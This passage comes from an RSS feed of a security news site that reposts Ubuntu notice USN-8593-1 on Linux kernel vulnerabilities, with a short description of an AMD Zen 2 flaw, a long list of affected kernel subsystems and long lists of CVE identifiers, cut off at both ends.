CVE-2026-31728, CVE-2026-31729, CVE-2026-31730, CVE-2026-31731,
CVE-2026-31737, CVE-2026-31738, CVE-2026-31740, CVE-2026-31741,
CVE-2026-31747, CVE-2026-31748, CVE-2026-31749, CVE-2026-31751,
CVE-2026-31752, CVE-2026-31754, CVE-2026-31755, CVE-2026-31756,
CVE-2026-31758, CVE-2026-31759, CVE-2026-31761, CVE-2026-31762,
CVE-2026-31763, CVE-2026-31767, CVE-2026-31768, CVE-2026-31770,
CVE-2026-31772, CVE-2026-31773, CVE-2026-31778, CVE-2026-31779,
CVE-2026-31780, CVE-2026-31781, CVE-2026-31788, CVE-2026-43007,
CVE-2026-43012, CVE-2026-43013, CVE-2026-43014, CVE-2026-43015,
CVE-2026-43016, CVE-2026-43017, CVE-2026-43018, CVE-2026-43019,
CVE-2026-43020, CVE-2026-43023, CVE-2026-43024, CVE-2026-43025,
CVE-2026-43026, CVE-2026-43027, CVE-2026-43028, CVE-2026-43030,
CVE-2026-43032, CVE-2026-43035, CVE-2026-43036, CVE-2026-43040,
CVE-2026-43041, CVE-2026-43043, CVE-2026-43044, CVE-2026-43046,
CVE-2026-43047, CVE-2026-43049, CVE-2026-43050, CVE-2026-43051,
CVE-2026-43052, CVE-2026-43054, CVE-2026-43056, CVE-2026-43057,
CVE-2026-43058, CVE-2026-43059, CVE-2026-43060, CVE-2026-43061,
CVE-2026-43062, CVE-2026-43064, CVE-2026-43065, CVE-2026-43066,
CVE-2026-43068, CVE-2026-43069, CVE-2026-43072, CVE-2026-43073,
CVE-2026-43074, CVE-2026-43075, CVE-2026-43076, CVE-2026-43079,
CVE-2026-43080, CVE-2026-43081, CVE-2026-43082, CVE-2026-43084,
CVE-2026-43085, CVE-2026-43086, CVE-2026-43088, CVE-2026-43089,
CVE-2026-43091, CVE-2026-43092, CVE-2026-43093, CVE-2026-43094,
CVE-2026-43098, CVE-2026-43099, CVE-2026-43103, CVE-2026-43104,
CVE-2026-43105, CVE-2026-43107, CVE-2026-43109, CVE-2026-43110,
CVE-2026-43111, CVE-2026-43112, CVE-2026-43113, CVE-2026-43119,
CVE-2026-43120, CVE-2026-43129, CVE-2026-43162, CVE-2026-43245,
CVE-2026-43252, CVE-2026-43265, CVE-2026-43281, CVE-2026-43324,
CVE-2026-43327, CVE-2026-43328, CVE-2026-43329, CVE-2026-43330,
CVE-2026-43332, CVE-2026-43333, CVE-2026-43334, CVE-2026-43336,
CVE-2026-43338, CVE-2026-43339, CVE-2026-43340, CVE-2026-43342,
CVE-2026-43343, CVE-2026-43345, CVE-2026-43350, CVE-2026-43355,
CVE-2026-43357, CVE-2026-43359, CVE-2026-43360, CVE-2026-43361,
CVE-2026-43362, CVE-2026-43363, CVE-2026-43365, CVE-2026-43366,
CVE-2026-43368, CVE-2026-43370, CVE-2026-43371, CVE-2026-43372,
CVE-2026-43373, CVE-2026-43377, CVE-2026-43380, CVE-2026-43381,
CVE-2026-43382, CVE-2026-43386, CVE-2026-43387, CVE-2026-43395,
CVE-2026-43397, CVE-2026-43405, CVE-2026-43408, CVE-2026-43409,
CVE-2026-43411, CVE-2026-43412, CVE-2026-43413, CVE-2026-43415,
CVE-2026-43419, CVE-2026-43420, CVE-2026-43421, CVE-2026-43424,
CVE-2026-43425, CVE-2026-43426, CVE-2026-43427, CVE-2026-43428,
CVE-2026-43429, CVE-2026-43430, CVE-2026-43432, CVE-2026-43436,
CVE-2026-43437, CVE-2026-43439, CVE-2026-43441, CVE-2026-43445,
CVE-2026-43448, CVE-2026-43449, CVE-2026-43450, CVE-2026-43451,
CVE-2026-43452, CVE-2026-43453, CVE-2026-43455, CVE-2026-43456,
CVE-2026-43457, CVE-2026-43458, CVE-2026-43459, CVE-2026-43466,
CVE-2026-43467, CVE-2026-43468, CVE-2026-43469, CVE-2026-43471,
CVE-2026-43472, CVE-2026-43473, CVE-2026-43475, CVE-2026-43476,
CVE-2026-43480, CVE-2026-43483, CVE-2026-43484, CVE-2026-43488,
CVE-2026-43490, CVE-2026-43491, CVE-2026-43492, CVE-2026-43495,
CVE-2026-43496, CVE-2026-43497, CVE-2026-43499, CVE-2026-43502,
CVE-2026-45834, CVE-2026-45835, CVE-2026-45836, CVE-2026-45838,
CVE-2026-45839, CVE-2026-45840, CVE-2026-45841, CVE-2026-45842,
CVE-2026-45843, CVE-2026-45844, CVE-2026-45845, CVE-2026-45846,
CVE-2026-45855, CVE-2026-45858, CVE-2026-45899, CVE-2026-45911,
CVE-2026-45920, CVE-2026-45924, CVE-2026-45942, CVE-2026-45943,
CVE-2026-45956, CVE-2026-45958, CVE-2026-45985, CVE-2026-45986,
CVE-2026-45987, CVE-2026-45989, CVE-2026-45991, CVE-2026-45994,
CVE-2026-45996, CVE-2026-45997, CVE-2026-45999, CVE-2026-46002,
CVE-2026-46003, CVE-2026-46004, CVE-2026-46005, CVE-2026-46006,
CVE-2026-46007, CVE-2026-46009, CVE-2026-46011, CVE-2026-46012,
CVE-2026-46015, CVE-2026-46016, CVE-2026-46018, CVE-2026-46019,
CVE-2026-46021, CVE-2026-46022, CVE-2026-46023, CVE-2026-46024,
CVE-2026-46026, CVE-2026-46027, CVE-2026-46031, CVE-2026-46033,
CVE-2026-46037, CVE-2026-46038, CVE-2026-46040, CVE-2026-46041,
CVE-2026-46044, CVE-2026-46046, CVE-2026-46047, CVE-2026-46049,
CVE-2026-46050, CVE-2026-46051, CVE-2026-46052, CVE-2026-46053,
CVE-2026-46056, CVE-2026-46058, CVE-2026-46061, CVE-2026-46062,
CVE-2026-46063, CVE-2026-46064, CVE-2026-46065, CVE-2026-46068,
CVE-2026-46069, CVE-2026-46070, CVE-2026-46072, CVE-2026-46073,
CVE-2026-46075, CVE-2026-46076, CVE-2026-46077, CVE-2026-46078,
CVE-2026-46079, CVE-2026-46080, CVE-2026-46082, CVE-2026-46083,
CVE-2026-46084, CVE-2026-46086, CVE-2026-46088, CVE-2026-46089,
CVE-2026-46090, CVE-2026-46091, CVE-2026-46092, CVE-2026-46094,
CVE-2026-46098, CVE-2026-46099, CVE-2026-46101, CVE-2026-46102,
CVE-2026-46103, CVE-2026-46106, CVE-2026-46107, CVE-2026-46108,
CVE-2026-46110, CVE-2026-46111, CVE-2026-46112, CVE-2026-46113,
CVE-2026-46114, CVE-2026-46116, CVE-2026-46117, CVE-2026-46120,
CVE-2026-46121, CVE-2026-46122, CVE-2026-46123, CVE-2026-46124,
CVE-2026-46125, CVE-2026-46126, CVE-2026-46127, CVE-2026-46128,
CVE-2026-46129, CVE-2026-46131, CVE-2026-46132, CVE-2026-46133,
CVE-2026-46136, CVE-2026-46137, CVE-2026-46138, CVE-2026-46139,
CVE-2026-46142, CVE-2026-46143, CVE-2026-46144, CVE-2026-46145,
CVE-2026-46146, CVE-2026-46149, CVE-2026-46150, CVE-2026-46151,
CVE-2026-46152, CVE-2026-46157, CVE-2026-46159, CVE-2026-46160,
CVE-2026-46161, CVE-2026-46163, CVE-2026-46164, CVE-2026-46167,
CVE-2026-46168, CVE-2026-46169, CVE-2026-46172, CVE-2026-46173,
CVE-2026-46174, CVE-2026-46176, CVE-2026-46177, CVE-2026-46178,
CVE-2026-46179, CVE-2026-46180, CVE-2026-46184, CVE-2026-46186,
CVE-2026-46187, CVE-2026-46189, CVE-2026-46190, CVE-2026-46191,
CVE-2026-46193, CVE-2026-46194, CVE-2026-46196, CVE-2026-46197,
CVE-2026-46198, CVE-2026-46199, CVE-2026-46200, CVE-2026-46201,
CVE-2026-46204, CVE-2026-46205, CVE-2026-46206, CVE-2026-46207,
CVE-2026-46208, CVE-2026-46209, CVE-2026-46211, CVE-2026-46212,
CVE-2026-46214, CVE-2026-46218, CVE-2026-46219, CVE-2026-46220,
CVE-2026-46225, CVE-2026-46226, CVE-2026-46227, CVE-2026-46229,
CVE-2026-46230, CVE-2026-46231, CVE-2026-46232, CVE-2026-46233,
CVE-2026-46234, CVE-2026-46235, CVE-2026-46236, CVE-2026-46238,
CVE-2026-46241, CVE-2026-46273, CVE-2026-46274, CVE-2026-46280,
CVE-2026-46282, CVE-2026-46285, CVE-2026-46286, CVE-2026-46287,
CVE-2026-46291, CVE-2026-46292, CVE-2026-46293, CVE-2026-46294,
CVE-2026-46296, CVE-2026-46299, CVE-2026-46301, CVE-2026-46303,
CVE-2026-46304, CVE-2026-46306, CVE-2026-46307, CVE-2026-46312,
CVE-2026-46314, CVE-2026-46319, CVE-2026-52911, CVE-2026-52920,
CVE-2026-52925, CVE-2026-52933, CVE-2026-52936, CVE-2026-52951,
CVE-2026-52954, CVE-2026-52955, CVE-2026-52957, CVE-2026-52958,
CVE-2026-52961, CVE-2026-52962, CVE-2026-52963, CVE-2026-52964,
CVE-2026-52967, CVE-2026-52968, CVE-2026-52969, CVE-2026-52970,
CVE-2026-52974, CVE-2026-52975, CVE-2026-52977, CVE-2026-52981,
CVE-2026-52982, CVE-2026-52984, CVE-2026-52985, CVE-2026-52986,
CVE-2026-52989, CVE-2026-52990, CVE-2026-52992, CVE-2026-52993,
CVE-2026-52995, CVE-2026-52998, CVE-2026-52999, CVE-2026-53001,
CVE-2026-53002, CVE-2026-53003, CVE-2026-53004, CVE-2026-53006,
CVE-2026-53011, CVE-2026-53012, CVE-2026-53013, CVE-2026-53014,
CVE-2026-53015, CVE-2026-53016, CVE-2026-53021, CVE-2026-53022,
CVE-2026-53023, CVE-2026-53032, CVE-2026-53033, CVE-2026-53034,
CVE-2026-53035, CVE-2026-53036, CVE-2026-53037, CVE-2026-53039,
CVE-2026-53040, CVE-2026-53041, CVE-2026-53043, CVE-2026-53045,
CVE-2026-53046, CVE-2026-53047, CVE-2026-53048, CVE-2026-53049,
CVE-2026-53050, CVE-2026-53052, CVE-2026-53056, CVE-2026-53058,
CVE-2026-53059, CVE-2026-53060, CVE-2026-53061, CVE-2026-53062,
CVE-2026-53063, CVE-2026-53064, CVE-2026-53065, CVE-2026-53066,
CVE-2026-53068, CVE-2026-53069, CVE-2026-53071, CVE-2026-53072,
CVE-2026-53073, CVE-2026-53074, CVE-2026-53075, CVE-2026-53076,
CVE-2026-53077, CVE-2026-53082, CVE-2026-53083, CVE-2026-53084,
CVE-2026-53085, CVE-2026-53086, CVE-2026-53088, CVE-2026-53093,
CVE-2026-53094, CVE-2026-53096, CVE-2026-53097, CVE-2026-53098,
CVE-2026-53110, CVE-2026-53111, CVE-2026-53112, CVE-2026-53115,
CVE-2026-53117, CVE-2026-53122, CVE-2026-53123, CVE-2026-53126,
CVE-2026-53128, CVE-2026-53130, CVE-2026-53279, CVE-2026-53287,
CVE-2026-53289, CVE-2026-53291, CVE-2026-53293, CVE-2026-53294,
CVE-2026-53295, CVE-2026-53296, CVE-2026-53303, CVE-2026-53304,
CVE-2026-53306, CVE-2026-53309, CVE-2026-53314, CVE-2026-53320,
CVE-2026-53369, CVE-2026-53374, CVE-2026-53375, CVE-2026-53376,
CVE-2026-53379, CVE-2026-63838, CVE-2026-63843, CVE-2026-63844,
CVE-2026-63845, CVE-2026-63846, CVE-2026-63847, CVE-2026-63848,
CVE-2026-63851, CVE-2026-63852, CVE-2026-63854, CVE-2026-63855,
CVE-2026-63856, CVE-2026-63860, CVE-2026-63861, CVE-2026-63862,
CVE-2026-63865, CVE-2026-64164)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8593-1: Linux kernel vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

Several security iss...]]></description>
<link>https://tsecurity.de/de/3688306/unix-server/usn-8593-1-linux-kernel-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688306/unix-server/usn-8593-1-linux-kernel-vulnerabilities/</guid>
<pubDate>Thu, 23 Jul 2026 09:46:45 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - x86 platform drivers;
  - PSP security protocol;
  - ARM32 architecture;
  - ARM64 architecture;
  - MIPS architecture;
  - PowerPC architecture;
  - RISC-V architecture;
  - S390 architecture;
  - User-Mode Linux (UML);
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Intel NPU Driver;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Auxiliary display drivers;
  - Drivers core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - Ublk userspace block driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - Clock framework and drivers;
  - CPU frequency scaling framework;
  - Hardware crypto device drivers;
  - Buffer Sharing and Synchronization framework;
  - DPLL subsystem;
  - EDAC drivers;
  - Arm Firmware Framework for ARMv8-A(FFA);
  - EFI core;
  - FWCTL subsystem;
  - GPIO subsystem;
  - GPU drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - I3C subsystem;
  - IIO ADC drivers;
  - IIO subsystem;
  - InfiniBand drivers;
  - Input Device core drivers;
  - IOMMU subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - NVIDIA Tegra memory controller driver;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Texas Instruments network drivers;
  - MediaTek network drivers;
  - NVME drivers;
  - Parport drivers;
  - PCI subsystem;
  - Pin controllers subsystem;
  - Chrome hardware platform drivers;
  - ACPI WMI driver;
  - Generic PM domains;
  - MediaTek PM domains;
  - Power supply drivers;
  - MPAM driver;
  - Amlogic Meson reset controller drivers;
  - S/390 drivers;
  - SCSI subsystem;
  - NVIDIA Tegra Control Backbone (CBB) driver;
  - SPI subsystem;
  - Greybus lights staging drivers;
  - Media staging drivers;
  - Realtek RTL8723BS SDIO drivers;
  - TCM subsystem;
  - Thunderbolt and USB4 drivers;
  - TTY drivers;
  - Userspace I/O drivers;
  - USB Device Class drivers;
  - ULPI bus;
  - DesignWare USB2 driver;
  - USB Gadget drivers;
  - USB Dual Role (OTG-ready) Controller drivers;
  - USB Serial drivers;
  - USB Type-C support driver;
  - USB Type-C Port Controller Manager driver;
  - TI TPS6598x USB Power Delivery controller driver;
  - USB Type-C Connector System Software Interface driver;
  - USB over IP driver;
  - vDPA drivers;
  - VFIO drivers;
  - Framebuffer layer;
  - TSM AMD SEV Guest driver;
  - Xen hypervisor drivers;
  - 9P distributed file system;
  - File systems infrastructure;
  - AFS file system;
  - BTRFS file system;
  - Ceph distributed file system;
  - EROFS file system;
  - F2FS file system;
  - FUSE (File system in Userspace);
  - GFS2 file system;
  - HFS+ file system;
  - HugeTLB file system;
  - Network file systems library;
  - Network file system (NFS) server daemon;
  - NILFS2 file system;
  - File system notification infrastructure;
  - NTFS3 file system;
  - OCFS2 file system;
  - Overlay file system;
  - Diskquota system;
  - SMB network file system;
  - Tracing file system;
  - UDF file system;
  - DRM TTM subsystem;
  - Control group (cgroup);
  - Kernel CPU control infrastructure;
  - Tracing infrastructure;
  - QorIQ DPAA2 FSL-MC bus driver;
  - Freescale ENETC Ethernet drivers;
  - Memory management;
  - Memory Management;
  - Linked list library;
  - Netfilter;
  - padata parallel execution mechanism;
  - PPP protocol drivers and compressors;
  - Bluetooth subsystem;
  - Networking core;
  - Network shaper API;
  - Network traffic control;
  - TCP network protocol;
  - XFRM subsystem;
  - io_uring subsystem;
  - IPC subsystem;
  - Audit subsystem;
  - BPF subsystem;
  - DMA mapping infrastructure;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - IRQ subsystem;
  - Kexec HandOver (KHO);
  - Padata parallel execution mechanism;
  - Scheduler infrastructure;
  - Cryptographic library;
  - KProbes tracing;
  - 802.1Q VLAN protocol;
  - B.A.T.M.A.N. meshing protocol;
  - Ethernet bridge;
  - Ceph Core library;
  - Distributed Switch Architecture;
  - Ethtool driver;
  - Handshake API;
  - HSR network protocol;
  - IPv4 networking;
  - IPv6 networking;
  - IUCV driver;
  - L2TP protocol;
  - MAC80211 subsystem;
  - Multipath TCP;
  - NFC subsystem;
  - Open vSwitch;
  - Phonet protocol;
  - RDS protocol;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - Integrity Measurement Architecture(IMA) framework;
  - Key management;
  - Linux Security Modules (LSM) Framework;
  - SELinux security module;
  - ALSA framework;
  - HD-audio driver;
  - AudioScience HPI driver;
  - FourSemi audio codecs;
  - Texas InstrumentS Audio (ASoC/HDA) drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - KVM subsystem;
(CVE-2026-43490, CVE-2026-43492, CVE-2026-43495, CVE-2026-43496,
CVE-2026-43497, CVE-2026-43498, CVE-2026-43502, CVE-2026-45834,
CVE-2026-45835, CVE-2026-45836, CVE-2026-45837, CVE-2026-45838,
CVE-2026-45839, CVE-2026-45840, CVE-2026-45841, CVE-2026-45842,
CVE-2026-45843, CVE-2026-45844, CVE-2026-45845, CVE-2026-45846,
CVE-2026-46104, CVE-2026-46105, CVE-2026-46106, CVE-2026-46107,
CVE-2026-46108, CVE-2026-46109, CVE-2026-46110, CVE-2026-46111,
CVE-2026-46112, CVE-2026-46113, CVE-2026-46114, CVE-2026-46116,
CVE-2026-46117, CVE-2026-46118, CVE-2026-46120, CVE-2026-46121,
CVE-2026-46122, CVE-2026-46123, CVE-2026-46124, CVE-2026-46125,
CVE-2026-46126, CVE-2026-46127, CVE-2026-46128, CVE-2026-46129,
CVE-2026-46130, CVE-2026-46131, CVE-2026-46132, CVE-2026-46133,
CVE-2026-46134, CVE-2026-46136, CVE-2026-46138, CVE-2026-46139,
CVE-2026-46140, CVE-2026-46141, CVE-2026-46142, CVE-2026-46143,
CVE-2026-46144, CVE-2026-46145, CVE-2026-46146, CVE-2026-46147,
CVE-2026-46148, CVE-2026-46149, CVE-2026-46150, CVE-2026-46151,
CVE-2026-46152, CVE-2026-46153, CVE-2026-46154, CVE-2026-46156,
CVE-2026-46157, CVE-2026-46158, CVE-2026-46159, CVE-2026-46160,
CVE-2026-46161, CVE-2026-46162, CVE-2026-46163, CVE-2026-46164,
CVE-2026-46165, CVE-2026-46166, CVE-2026-46167, CVE-2026-46168,
CVE-2026-46169, CVE-2026-46170, CVE-2026-46171, CVE-2026-46172,
CVE-2026-46173, CVE-2026-46174, CVE-2026-46175, CVE-2026-46176,
CVE-2026-46177, CVE-2026-46178, CVE-2026-46179, CVE-2026-46180,
CVE-2026-46181, CVE-2026-46182, CVE-2026-46183, CVE-2026-46184,
CVE-2026-46186, CVE-2026-46187, CVE-2026-46188, CVE-2026-46189,
CVE-2026-46190, CVE-2026-46191, CVE-2026-46192, CVE-2026-46193,
CVE-2026-46194, CVE-2026-46196, CVE-2026-46197, CVE-2026-46198,
CVE-2026-46199, CVE-2026-46200, CVE-2026-46201, CVE-2026-46202,
CVE-2026-46203, CVE-2026-46204, CVE-2026-46205, CVE-2026-46206,
CVE-2026-46207, CVE-2026-46208, CVE-2026-46209, CVE-2026-46210,
CVE-2026-46211, CVE-2026-46212, CVE-2026-46213, CVE-2026-46214,
CVE-2026-46215, CVE-2026-46216, CVE-2026-46218, CVE-2026-46219,
CVE-2026-46220, CVE-2026-46221, CVE-2026-46222, CVE-2026-46223,
CVE-2026-46224, CVE-2026-46225, CVE-2026-46226, CVE-2026-46227,
CVE-2026-46228, CVE-2026-46229, CVE-2026-46230, CVE-2026-46231,
CVE-2026-46232, CVE-2026-46233, CVE-2026-46234, CVE-2026-46235,
CVE-2026-46236, CVE-2026-46238, CVE-2026-46239, CVE-2026-46240,
CVE-2026-46241, CVE-2026-46242, CVE-2026-46273, CVE-2026-46274,
CVE-2026-46275, CVE-2026-46290, CVE-2026-46291, CVE-2026-46292,
CVE-2026-46293, CVE-2026-46294, CVE-2026-46295, CVE-2026-46296,
CVE-2026-46297, CVE-2026-46298, CVE-2026-46299, CVE-2026-46301,
CVE-2026-46302, CVE-2026-46303, CVE-2026-46304, CVE-2026-46305,
CVE-2026-46306, CVE-2026-46307, CVE-2026-46308, CVE-2026-46309,
CVE-2026-46310, CVE-2026-46311, CVE-2026-46312, CVE-2026-46313,
CVE-2026-46314, CVE-2026-46315, CVE-2026-46317, CVE-2026-46318,
CVE-2026-46319, CVE-2026-46320, CVE-2026-46321, CVE-2026-46322,
CVE-2026-46324, CVE-2026-52911, CVE-2026-52912, CVE-2026-52913,
CVE-2026-52914, CVE-2026-52915, CVE-2026-52916, CVE-2026-52918,
CVE-2026-52919, CVE-2026-52920, CVE-2026-52921, CVE-2026-52922,
CVE-2026-52923, CVE-2026-52925, CVE-2026-52926, CVE-2026-52927,
CVE-2026-52928, CVE-2026-52931, CVE-2026-52932, CVE-2026-52934,
CVE-2026-52936, CVE-2026-52937, CVE-2026-52941, CVE-2026-52943,
CVE-2026-52944, CVE-2026-52949, CVE-2026-52950, CVE-2026-52951,
CVE-2026-52952, CVE-2026-52953, CVE-2026-52954, CVE-2026-52955,
CVE-2026-52956, CVE-2026-52957, CVE-2026-52958, CVE-2026-52959,
CVE-2026-52960, CVE-2026-52961, CVE-2026-52962, CVE-2026-52963,
CVE-2026-52964, CVE-2026-52965, CVE-2026-52967, CVE-2026-52968,
CVE-2026-52969, CVE-2026-52970, CVE-2026-52971, CVE-2026-52973,
CVE-2026-52974, CVE-2026-52975, CVE-2026-52976, CVE-2026-52977,
CVE-2026-52978, CVE-2026-52979, CVE-2026-52980, CVE-2026-52981,
CVE-2026-52982, CVE-2026-52983, CVE-2026-52984, CVE-2026-52985,
CVE-2026-52986, CVE-2026-52987, CVE-2026-52988, CVE-2026-52989,
CVE-2026-52990, CVE-2026-52991, CVE-2026-52992, CVE-2026-52993,
CVE-2026-52994, CVE-2026-52995, CVE-2026-52996, CVE-2026-52997,
CVE-2026-52998, CVE-2026-52999, CVE-2026-53000, CVE-2026-53001,
CVE-2026-53002, CVE-2026-53003, CVE-2026-53004, CVE-2026-53005,
CVE-2026-53006, CVE-2026-53007, CVE-2026-53008, CVE-2026-53009,
CVE-2026-53010, CVE-2026-53011, CVE-2026-53012, CVE-2026-53013,
CVE-2026-53014, CVE-2026-53015, CVE-2026-53016, CVE-2026-53017,
CVE-2026-53018, CVE-2026-53019, CVE-2026-53020, CVE-2026-53021,
CVE-2026-53022, CVE-2026-53023, CVE-2026-53024, CVE-2026-53025,
CVE-2026-53026, CVE-2026-53027, CVE-2026-53028, CVE-2026-53029,
CVE-2026-53030, CVE-2026-53031, CVE-2026-53032, CVE-2026-53033,
CVE-2026-53034, CVE-2026-53035, CVE-2026-53036, CVE-2026-53037,
CVE-2026-53038, CVE-2026-53039, CVE-2026-53040, CVE-2026-53041,
CVE-2026-53042, CVE-2026-53043, CVE-2026-53044, CVE-2026-53045,
CVE-2026-53046, CVE-2026-53047, CVE-2026-53048, CVE-2026-53049,
CVE-2026-53050, CVE-2026-53051, CVE-2026-53052, CVE-2026-53053,
CVE-2026-53054, CVE-2026-53055, CVE-2026-53056, CVE-2026-53057,
CVE-2026-53058, CVE-2026-53059, CVE-2026-53060, CVE-2026-53061,
CVE-2026-53062, CVE-2026-53063, CVE-2026-53064, CVE-2026-53065,
CVE-2026-53066, CVE-2026-53067, CVE-2026-53068, CVE-2026-53069,
CVE-2026-53070, CVE-2026-53071, CVE-2026-53072, CVE-2026-53073,
CVE-2026-53074, CVE-2026-53075, CVE-2026-53076, CVE-2026-53077,
CVE-2026-53078, CVE-2026-53079, CVE-2026-53080, CVE-2026-53081,
CVE-2026-53082, CVE-2026-53083, CVE-2026-53084, CVE-2026-53085,
CVE-2026-53086, CVE-2026-53087, CVE-2026-53088, CVE-2026-53089,
CVE-2026-53090, CVE-2026-53091, CVE-2026-53092, CVE-2026-53093,
CVE-2026-53094, CVE-2026-53095, CVE-2026-53096, CVE-2026-53097,
CVE-2026-53098, CVE-2026-53099, CVE-2026-53100, CVE-2026-53101,
CVE-2026-53102, CVE-2026-53103, CVE-2026-53104, CVE-2026-53105,
CVE-2026-53106, CVE-2026-53107, CVE-2026-53108, CVE-2026-53109,
CVE-2026-53110, CVE-2026-53111, CVE-2026-53112, CVE-2026-53113,
CVE-2026-53114, CVE-2026-53115, CVE-2026-53116, CVE-2026-53117,
CVE-2026-53118, CVE-2026-53119, CVE-2026-53120, CVE-2026-53121,
CVE-2026-53122, CVE-2026-53123, CVE-2026-53124, CVE-2026-53125,
CVE-2026-53126, CVE-2026-53127, CVE-2026-53128, CVE-2026-53129,
CVE-2026-53130, CVE-2026-53174, CVE-2026-53277, CVE-2026-53278,
CVE-2026-53279, CVE-2026-53280, CVE-2026-53281, CVE-2026-53282,
CVE-2026-53283, CVE-2026-53284, CVE-2026-53285, CVE-2026-53286,
CVE-2026-53287, CVE-2026-53288, CVE-2026-53289, CVE-2026-53290,
CVE-2026-53291, CVE-2026-53292, CVE-2026-53293, CVE-2026-53294,
CVE-2026-53295, CVE-2026-53296, CVE-2026-53297, CVE-2026-53298,
CVE-2026-53299, CVE-2026-53300, CVE-2026-53301, CVE-2026-53302,
CVE-2026-53303, CVE-2026-53304, CVE-2026-53305, CVE-2026-53306,
CVE-2026-53307, CVE-2026-53308, CVE-2026-53309, CVE-2026-53310,
CVE-2026-53311, CVE-2026-53312, CVE-2026-53313, CVE-2026-53314,
CVE-2026-53315, CVE-2026-53316, CVE-2026-53317, CVE-2026-53318,
CVE-2026-53319, CVE-2026-53320, CVE-2026-53321, CVE-2026-53322,
CVE-2026-53323, CVE-2026-53324, CVE-2026-53357, CVE-2026-53358,
CVE-2026-53360, CVE-2026-53364, CVE-2026-53365, CVE-2026-53367,
CVE-2026-53368, CVE-2026-53369, CVE-2026-53370, CVE-2026-53371,
CVE-2026-53372, CVE-2026-53373, CVE-2026-53374, CVE-2026-53375,
CVE-2026-53376, CVE-2026-53377, CVE-2026-53378, CVE-2026-53379,
CVE-2026-53380, CVE-2026-63837, CVE-2026-63838, CVE-2026-63839,
CVE-2026-63840, CVE-2026-63841, CVE-2026-63842, CVE-2026-63843,
CVE-2026-63844, CVE-2026-63845, CVE-2026-63846, CVE-2026-63847,
CVE-2026-63848, CVE-2026-63849, CVE-2026-63850, CVE-2026-63851,
CVE-2026-63852, CVE-2026-63853, CVE-2026-63854, CVE-2026-63855,
CVE-2026-63856, CVE-2026-63857, CVE-2026-63858, CVE-2026-63859,
CVE-2026-63860, CVE-2026-63861, CVE-2026-63862, CVE-2026-63863,
CVE-2026-63864, CVE-2026-63865, CVE-2026-63866, CVE-2026-63875,
CVE-2026-63876, CVE-2026-63877, CVE-2026-63878, CVE-2026-63879,
CVE-2026-63880, CVE-2026-63881, CVE-2026-63882, CVE-2026-63883,
CVE-2026-63884, CVE-2026-63886, CVE-2026-63887, CVE-2026-63888,
CVE-2026-63889, CVE-2026-63890, CVE-2026-63891, CVE-2026-63892,
CVE-2026-63893, CVE-2026-63894, CVE-2026-63895, CVE-2026-63896,
CVE-2026-63897, CVE-2026-63898, CVE-2026-63899, CVE-2026-63900,
CVE-2026-63901, CVE-2026-63902, CVE-2026-63903, CVE-2026-63904,
CVE-2026-63905, CVE-2026-63906, CVE-2026-63907, CVE-2026-63908,
CVE-2026-63909, CVE-2026-63910, CVE-2026-63911, CVE-2026-63912,
CVE-2026-63913, CVE-2026-63914, CVE-2026-63915, CVE-2026-63916,
CVE-2026-63917, CVE-2026-63918, CVE-2026-63919, CVE-2026-63920,
CVE-2026-63921, CVE-2026-63922, CVE-2026-63923, CVE-2026-63924,
CVE-2026-63925, CVE-2026-63926, CVE-2026-63927, CVE-2026-63928,
CVE-2026-63929, CVE-2026-63930, CVE-2026-63931, CVE-2026-63932,
CVE-2026-63933, CVE-2026-63934, CVE-2026-63935, CVE-2026-63936,
CVE-2026-63937, CVE-2026-63938, CVE-2026-63939, CVE-2026-63940,
CVE-2026-63941, CVE-2026-63942, CVE-2026-63943, CVE-2026-63944,
CVE-2026-63945, CVE-2026-63946, CVE-2026-63947, CVE-2026-63948,
CVE-2026-63949, CVE-2026-63950, CVE-2026-63951, CVE-2026-63952,
CVE-2026-63953, CVE-2026-63954, CVE-2026-63955, CVE-2026-63956,
CVE-2026-63957, CVE-2026-63958, CVE-2026-63959, CVE-2026-63960,
CVE-2026-63961, CVE-2026-63962, CVE-2026-63963, CVE-2026-63964,
CVE-2026-63965, CVE-2026-63966, CVE-2026-63967, CVE-2026-63968,
CVE-2026-63969, CVE-2026-63970, CVE-2026-63971, CVE-2026-63972,
CVE-2026-63973, CVE-2026-63974, CVE-2026-63975, CVE-2026-63976,
CVE-2026-63977, CVE-2026-63978, CVE-2026-63979, CVE-2026-63980,
CVE-2026-63981, CVE-2026-63982, CVE-2026-63983, CVE-2026-63984,
CVE-2026-63985, CVE-2026-63986, CVE-2026-63987, CVE-2026-63988,
CVE-2026-63989, CVE-2026-63990, CVE-2026-63991, CVE-2026-63992,
CVE-2026-63993, CVE-2026-63994, CVE-2026-63995, CVE-2026-63996,
CVE-2026-63997, CVE-2026-63998, CVE-2026-63999, CVE-2026-64000,
CVE-2026-64001, CVE-2026-64002, CVE-2026-64003, CVE-2026-64004,
